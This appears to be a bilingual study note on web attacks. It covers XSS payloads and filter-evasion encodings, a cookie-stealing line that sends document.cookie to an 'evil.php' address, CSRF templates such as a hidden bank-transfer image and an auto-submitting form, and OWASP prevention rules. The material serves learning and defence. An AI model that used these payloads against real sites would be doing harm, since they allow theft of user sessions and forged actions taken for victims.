Cross-site Scripting (XSS) 跨站脚本

恶意代码注入

XSS using Script in Attributes

XSS attacks may be conducted without using tags. Other tags will do exactly the same thing, for example:

1
<body onload=alert('test1')>

or other attributes like: onmouseover, onerror.
onmouseover

1
<b onmouseover=alert('Wufff!')>click me!</b>

onerror

1
<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>

XSS using Script Via Encoded URI Schemes

使用编码绕过过滤 如:a=&#X41 (UTF-8)

1
<IMG SRC=j&#X41vascript:alert('test2')>

XSS using code encoding

We may encode our script in base64 and place it in META tag.

1
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">

伪协议

1
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a>

反射型XSS

获取用户cookies

1
2
3
<SCRIPT type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
</SCRIPT>

存储型

隐蔽性高

DOM(Document Object Model) XSS

动态修改html页面

1
2
3
4
5
<body>
<script>
document.write(document.location.href.substring(document.location.href.indexOf("default=")+8));
</script>
</body>

The malicious script can be embedded in the URL as follows in two ways:

1
2
3
http://www.some.site/page.html?default=<script>alert(document.cookie)</script>
or 
http://www.some.site/page.html#default=<script>alert(document.cookie)</script>

浏览器防护(自动URL编码)
%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS Ajax提交表单getshell

XSS (Cross Site Scripting) Prevention Cheat Sheet

https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

  1. 仔细验证不可信数据
  2. HTML实体编码 You MUST use the escape syntax for the part of the HTML document you’re putting untrusted data into.

XSS Prevention Rules

RULE #0 don’t put untrusted data into your HTML document
RULE #1 HTML Escape

1
2
3
4
5
6
& --> &amp;
< --> &lt;
> --> &gt;
" --> &quot;
' --> &#x27;     &apos; is in the XML and XHTML specs.
/ --> &#x2F;     forward slash is included as it helps end an HTML entity

RULE #2 - Attribute Escape

1
<input type="text" name="fname" value="UNTRUSTED DATA">

RULE #3 - JavaScript Escape

1
2
3
4
5
6
<script>var currentValue='UNTRUSTED DATA';</script>
<script>someFunction('UNTRUSTED DATA');</script> 
//编码
<SCRIPT>alert("XSS")</SCRIPT> 
&lt;SCRIPT&gt;alert&#x28;&quot;XSS&quot;&#x29;&lt;&#x2f;SCRIPT&gt;

  • Ensure JavaScript variables are quoted
  • JavaScript Hex Encoding
  • JavaScript Unicode Encoding
  • Avoid backslash encoding (\” or \’ or \)

RULE #4 - CSS Escape And Strictly Validate

1
<div style="width: UNTRUSTED DATA;">Selection</div>

  • CSS Hex encoding

Except for alphanumeric characters, escape all characters with ASCII values less than 256 with the \HH escaping format.
RULE #5 - URL Escape

1
<a href="/site/search?value=<?php echo urlencode($_GET['url']) ?>">clickme</a>

RULE #6 - Sanitize HTML Markup
PHP Html Purifier - http://htmlpurifier.org/
RULE #7 - Prevent DOM-based XSS

Others
Use HTTPOnly cookie flag

XSS Filter Evasion

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

  • XSS Platform
  • XSS 编码
  • OWASP XSSER
  1. 编码
1
2
3
4
5
URL编码 空格(%20)
HTML实体编码 < (&lt;)
字符编码 十进制、十六进制ASCII码或unicode字符编码 < (&#60;)  >(&#62;)
Js编码 < (u003c) >(u003e)
CSS编码 \65

HTML实体编码














































显示结果 描述 实体名称 实体编号
  空格 &nbsp; &#160;
< 小于号 &lt; &#60;
> 大于号 &gt; &#62;
& 和号 &amp; &#38;
引号 &quot; &#34;
撇号  &apos; (IE不支持) &#39;

Unicode编码

1
2
<a onclick="javascript:alert(/xss/)">click</a>
<a onclick="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#47;&#120;&#115;&#115;&#47;&#41;">click</a>

  1. 单引号

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

  1. 其他

使用tab键空开
<IMG SRC="jav ascript:alert('XSS');">

编码tab
<IMG SRC="jav&#x09;ascript:alert('XSS');">

使用制表符, 换行符和回车符

加入新行; Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work.

<IMG SRC="jav&#x0A;ascript:alert('XSS');">








































TypeHorizontal TabNew lineCarriage Return
URL%09%10%13
Minimal Sized Hex&#x9&#xA&#xD
Maximum Sized Hex&#x0000009;&#x000000A;&#x000000D;
Minimum Sized Decimal&#9&#10&#13
Maximum Sized Decimal&#x0000009;&#x0000009;&#0000009;

Cross-Site Request Forgery (CSRF) 跨站脚本请求伪造

向服务器提交数据

在a.com中访问b.com(或者受害者通过邮件点击访问example.com/delete?rule=*),某些浏览器将自动发送其cookie

1
<iframe src="http://b.com/test.php"></iframe>

  • 自动删除文章
  • 自动添加管理员账号

GET scenario

1
<img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" width="0" height="0" border="0">

POST scenario

1
2
3
4
5
6
7
8
9
10
11
<!-- csrftest.html -->
<html>
<body onload='document.CSRF.submit()'>
<!-- 如果表单中存在name='submit'会冲突 -->
<form action='http://tagetWebsite/Authenticate.jsp' method='POST' name='CSRF'>
	<input type='hidden' name='name' value='Hacked'>
	<input type='hidden' name='password' value='Hacked'>
</form>
</body>
</html>

结合XSS漏洞攻击将悄无声息。

Prevent CSRF Vulnerabilities

  1. Check standard headers to verify the request is same origin

    • Origin Header
    • Referer Header (绕过referer)

  2. AND Check CSRF token

same-origin policy

同源策略:同协议、域名、端口,不能跨域访问。

如何实现跨域访问?

1. Access-Control-Allow-Origin 头

a.com 允许其他域访问本域资源

1
<?php header("Access-Control-Allow-Origin: *"); ?>

b.com

1
2
3
$.get("http://a.com/test.php", function(data){
alert(data);
});

2. getJSON

1
$.getJSON("http://www.runoob.com/try/ajax/jsonp.php?jsoncallback=?", function(data){ // 对返回的json的处理代码 });

3. iframe

跨域策略文件

crossdomain.xml